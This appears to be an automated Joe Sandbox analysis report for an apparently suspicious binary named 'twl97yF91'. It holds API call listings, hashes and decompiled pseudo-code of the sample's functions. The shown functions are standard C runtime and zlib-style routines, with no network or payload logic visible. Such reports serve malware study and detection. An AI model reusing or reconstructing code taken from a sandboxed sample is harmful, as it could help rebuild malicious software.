                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02CC7501
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC750B
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC7514
                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 02CC7545
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 02CC7570
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC75C9
                                                                                                                                                                                                          • _memset.LIBCMT ref: 02CC75EB
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 02CC7621
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC7636
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02CC7650
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2918745354-0
                                                                                                                                                                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                          • Instruction ID: 8b851e86a452177bd0091ad0d8ad5e5c3d0743f37d277b0fff0e4f8079d5e671
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B19F72900119EFDF119FA4CC808AEBFBAEF88358F25846DF919A6120D735CA59DF50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02CC0977,00000000,00000000,?,00000001,02CBC22D,02CBB993), ref: 02CC084E
                                                                                                                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 02CC0859
                                                                                                                                                                                                            • Part of subcall function 02CBE9D1: Sleep.KERNEL32(000003E8,00000000,?,02CC079F,KERNEL32.DLL,?,02CC07EB,?,00000001,02CBC22D,02CBB993), ref: 02CBE9DD
                                                                                                                                                                                                            • Part of subcall function 02CBE9D1: GetModuleHandleW.KERNEL32(00000001,?,02CC079F,KERNEL32.DLL,?,02CC07EB,?,00000001,02CBC22D,02CBB993), ref: 02CBE9E6
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC08B4
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02CC08C1
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC08D5
                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 02CC08F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                          • String ID: @.B$KERNEL32.DLL
                                                                                                                                                                                                          • API String ID: 4021795732-2520587274
                                                                                                                                                                                                          • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                          • Instruction ID: 2f2af7f27fae14e56878f92a3f552f8457747c5ebdbbf68ecbbc8c165efe1185
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11B471944701EED721EF75D8007CABBF1AF48310F60852ED4A9D32A1CB749641DF98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5A45
                                                                                                                                                                                                            • Part of subcall function 02CBBAB4: __FF_MSGBANNER.LIBCMT ref: 02CBBAD7
                                                                                                                                                                                                            • Part of subcall function 02CBBAB4: __NMSG_WRITE.LIBCMT ref: 02CBBADE
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5AA9
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5B6D
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5B97
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _malloc
                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                          • API String ID: 1579825452-2310465506
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                          			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                          				char* _t60;
                                                                                                                                                                                                          				char _t62;
                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                          				char _t64;
                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                                                          				intOrPtr _t70;
                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                          				intOrPtr _t82;
                                                                                                                                                                                                          				intOrPtr* _t83;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				char* _t88;
                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                          				intOrPtr* _t93;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                          				_t91 = __eax;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                          					_t101 = _t100 + 4;
                                                                                                                                                                                                          					if(_t93 == 0) {
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                                                                                                          						 *_t93 = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                                                                                                          						 *(_t93 + 0x6c) = _t98;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                                                                                                                                                          						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                                                                                                          						_t102 = _t101 + 0xc;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                                                                                                          						_t87 = _t57 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t82 =  *_t57;
                                                                                                                                                                                                          							_t57 = _t57 + 1;
                                                                                                                                                                                                          						} while (_t82 != 0);
                                                                                                                                                                                                          						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                                                                                                          						_t103 = _t102 + 4;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                                                                                                          						if(_t60 == 0) {
                                                                                                                                                                                                          							L30:
                                                                                                                                                                                                          							E00405160(0, _t87, _t93);
                                                                                                                                                                                                          							goto L31;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                                                                                                          							_t88 = _t60;
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							if( *_t91 == 0x72) {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t63 =  *_t91;
                                                                                                                                                                                                          							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t64 =  *_t91;
                                                                                                                                                                                                          							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                                                                                                          								__eflags = _t64 - 0x66;
                                                                                                                                                                                                          								if(_t64 != 0x66) {
                                                                                                                                                                                                          									__eflags = _t64 - 0x68;
                                                                                                                                                                                                          									if(_t64 != 0x68) {
                                                                                                                                                                                                          										__eflags = _t64 - 0x52;
                                                                                                                                                                                                          										if(_t64 != 0x52) {
                                                                                                                                                                                                          											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                                                                                                          											 *_t89 = _t64;
                                                                                                                                                                                                          											_t87 = _t89 + 1;
                                                                                                                                                                                                          											__eflags = _t87;
                                                                                                                                                                                                          											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t98 = _t64 - 0x30;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t91 = _t91 + 1;
                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t87 = _t103 + 0x68;
                                                                                                                                                                                                          							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                                                                                                          								goto L9;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							L26:
                                                                                                                                                                                                          							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                                                                                                          							if(_t65 == 0) {
                                                                                                                                                                                                          								goto L30;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(_t65 != 0x77) {
                                                                                                                                                                                                          									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                                                                                                          									 *_t93 = _t66;
                                                                                                                                                                                                          									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                                                                                                          									_t104 = _t103 + 0x14;
                                                                                                                                                                                                          									__eflags = _t67;
                                                                                                                                                                                                          									if(_t67 != 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											goto L34;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_push(0x38);
                                                                                                                                                                                                          									_push("1.2.3");
                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                          									_push(0xfffffff1);
                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                          									_push(_t98);
                                                                                                                                                                                                          									_push(_t93);
                                                                                                                                                                                                          									_t91 = E00404CE0();
                                                                                                                                                                                                          									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                                                                                                                                                          									_t104 = _t103 + 0x24;
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                                                                                                          									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                                                                                                          									if(_t91 != 0 || _t79 == 0) {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                                                                                                          										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                                                                                                                                                          										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                          										__eflags = _t69;
                                                                                                                                                                                                          										_push(_t104 + 0x18);
                                                                                                                                                                                                          										if(__eflags >= 0) {
                                                                                                                                                                                                          											_push(_t69);
                                                                                                                                                                                                          											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                                                                                                          											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                                                                                                          											_t70 = E0040CB9D();
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                                                                                                          										__eflags = _t70;
                                                                                                                                                                                                          										if(_t70 == 0) {
                                                                                                                                                                                                          											goto L30;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                                                                                                          											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                                                                                                          												E00405000(_t93, 0);
                                                                                                                                                                                                          												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                                                                                                          												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                                                                                                          												__eflags = _t74;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                                                                                                          												return _t93;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L42;
                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                          							_t62 =  *_t83;
                                                                                                                                                                                                          							 *_t88 = _t62;
                                                                                                                                                                                                          							_t83 = _t83 + 1;
                                                                                                                                                                                                          							_t88 = _t88 + 1;
                                                                                                                                                                                                          							if(_t62 != 0) {
                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							goto L9;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L42:
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x00405889
                                                                                                                                                                                                          0x00405897
                                                                                                                                                                                                          0x00405899
                                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                          0x004058b3
                                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                                          0x004058c1
                                                                                                                                                                                                          0x004058c5
                                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                                          0x004058c7
                                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058b7
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040589b
                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                          0x004058cc
                                                                                                                                                                                                          0x004058cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058d1
                                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058db
                                                                                                                                                                                                          0x004058db
                                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004058e2
                                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                                          0x00405930
                                                                                                                                                                                                          0x0040593f
                                                                                                                                                                                                          0x00405942
                                                                                                                                                                                                          0x00405944
                                                                                                                                                                                                          0x00405949
                                                                                                                                                                                                          0x0040594c
                                                                                                                                                                                                          0x0040594e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405950
                                                                                                                                                                                                          0x00405950
                                                                                                                                                                                                          0x00405953
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405953
                                                                                                                                                                                                          0x004058e6
                                                                                                                                                                                                          0x004058ea
                                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                                          0x004058f1
                                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                                          0x004058f4
                                                                                                                                                                                                          0x004058f6
                                                                                                                                                                                                          0x004058f8
                                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                                          0x00405904
                                                                                                                                                                                                          0x00405906
                                                                                                                                                                                                          0x0040590b
                                                                                                                                                                                                          0x0040590e
                                                                                                                                                                                                          0x00405911
                                                                                                                                                                                                          0x00405916
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405955
                                                                                                                                                                                                          0x00405961
                                                                                                                                                                                                          0x00405963
                                                                                                                                                                                                          0x00405967
                                                                                                                                                                                                          0x0040596d
                                                                                                                                                                                                          0x0040596e
                                                                                                                                                                                                          0x0040597c
                                                                                                                                                                                                          0x0040597d
                                                                                                                                                                                                          0x00405970
                                                                                                                                                                                                          0x00405970
                                                                                                                                                                                                          0x00405974
                                                                                                                                                                                                          0x00405975
                                                                                                                                                                                                          0x00405975
                                                                                                                                                                                                          0x00405985
                                                                                                                                                                                                          0x00405988
                                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                                          0x0040598c
                                                                                                                                                                                                          0x00405990
                                                                                                                                                                                                          0x004059a5
                                                                                                                                                                                                          0x004059ad
                                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                                          0x004059b6
                                                                                                                                                                                                          0x004059b9
                                                                                                                                                                                                          0x004059c5
                                                                                                                                                                                                          0x00405992
                                                                                                                                                                                                          0x00405992
                                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                                          0x004059a2
                                                                                                                                                                                                          0x00405990
                                                                                                                                                                                                          0x0040598a
                                                                                                                                                                                                          0x00405916
                                                                                                                                                                                                          0x004058e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405860
                                                                                                                                                                                                          0x00405860
                                                                                                                                                                                                          0x00405862
                                                                                                                                                                                                          0x00405864
                                                                                                                                                                                                          0x00405865
                                                                                                                                                                                                          0x00405868
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                                          0x0040586a
                                                                                                                                                                                                          0x0040586d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405868
                                                                                                                                                                                                          0x0040584f
                                                                                                                                                                                                          0x004057ea
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                          • API String ID: 680241177-2310465506
                                                                                                                                                                                                          • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                          • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3886058894-0
                                                                                                                                                                                                          • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction ID: 26cd10436aaa824d860efe8b52f370e482b9e09f2abf472120a144d091e75976
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2351D671900209EFCB228F799C485DEBBB5EF90368F14822AFC2596190D7719F51DF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                          			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char* _v12;
                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                          				intOrPtr* _t92;
                                                                                                                                                                                                          				signed int _t94;
                                                                                                                                                                                                          				char _t97;
                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          				signed int _t113;
                                                                                                                                                                                                          				intOrPtr* _t114;
                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                          				signed int _t119;
                                                                                                                                                                                                          				signed int _t120;
                                                                                                                                                                                                          				char* _t121;
                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                          				signed int _t131;
                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t125 = __edx;
                                                                                                                                                                                                          				_t121 = _a4;
                                                                                                                                                                                                          				_t119 = _a8;
                                                                                                                                                                                                          				_t131 = 0;
                                                                                                                                                                                                          				_v12 = _t121;
                                                                                                                                                                                                          				_v8 = _t119;
                                                                                                                                                                                                          				if(_a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t138 = _t121;
                                                                                                                                                                                                          					if(_t121 != 0) {
                                                                                                                                                                                                          						_t133 = _a20;
                                                                                                                                                                                                          						__eflags = _t133;
                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                          							L9:
                                                                                                                                                                                                          							__eflags = _t119 - 0xffffffff;
                                                                                                                                                                                                          							if(_t119 != 0xffffffff) {
                                                                                                                                                                                                          								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                                                                                                                                                                          								_t134 = _t134 + 0xc;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _t133 - _t131;
                                                                                                                                                                                                          							if(__eflags == 0) {
                                                                                                                                                                                                          								goto L3;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t94 = _t90 | 0xffffffff;
                                                                                                                                                                                                          								_t125 = _t94 % _a12;
                                                                                                                                                                                                          								__eflags = _a16 - _t94 / _a12;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									goto L3;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								L13:
                                                                                                                                                                                                          								_t131 = _a12 * _a16;
                                                                                                                                                                                                          								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                          								_v20 = _t131;
                                                                                                                                                                                                          								_t120 = _t131;
                                                                                                                                                                                                          								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                          									_v16 = 0x1000;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t131;
                                                                                                                                                                                                          								if(_t131 == 0) {
                                                                                                                                                                                                          									L40:
                                                                                                                                                                                                          									return _a16;
